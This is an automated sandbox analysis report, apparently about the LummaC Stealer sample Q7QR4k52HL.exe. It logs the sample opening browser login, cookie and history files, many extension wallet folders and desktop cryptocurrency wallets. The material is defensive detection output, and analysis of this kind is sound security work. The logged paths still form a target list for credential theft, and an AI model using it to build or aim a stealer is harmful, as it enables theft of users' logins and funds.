Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Directory queried: C:\Users\user\Documents\KATAXZVCPS	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Directory queried: C:\Users\user\Documents\KATAXZVCPS	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Directory queried: C:\Users\user\Documents\NIKHQAIQAU	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Directory queried: C:\Users\user\Documents\NIKHQAIQAU	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Directory queried: C:\Users\user\Documents\SFPUSAFIOL	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Directory queried: C:\Users\user\Documents\SFPUSAFIOL	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Directory queried: C:\Users\user\Documents\SQRKHNBNYN	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Directory queried: C:\Users\user\Documents\SQRKHNBNYN	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Directory queried: C:\Users\user\Documents\NIKHQAIQAU	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Directory queried: C:\Users\user\Documents\NIKHQAIQAU	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Directory queried: C:\Users\user\Documents\RAYHIWGKDI	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Directory queried: C:\Users\user\Documents\RAYHIWGKDI	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Directory queried: C:\Users\user\Documents\SFPUSAFIOL	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Directory queried: C:\Users\user\Documents\SFPUSAFIOL	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Directory queried: C:\Users\user\Documents\SFPUSAFIOL	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Directory queried: C:\Users\user\Documents\SFPUSAFIOL	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ	Jump to behavior
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ	Jump to behavior

Source: C:\Users\user\Desktop\Q7QR4k52HL.exe

Directory queried: number of queries: 1001

Source: Yara match	File source: 00000000.00000002.1929908575.0000000000554000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1743630116.0000000000553000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1743436987.0000000000500000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1742800786.0000000000500000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Q7QR4k52HL.exe PID: 6112, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: Process Memory Space: Q7QR4k52HL.exe PID: 6112, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
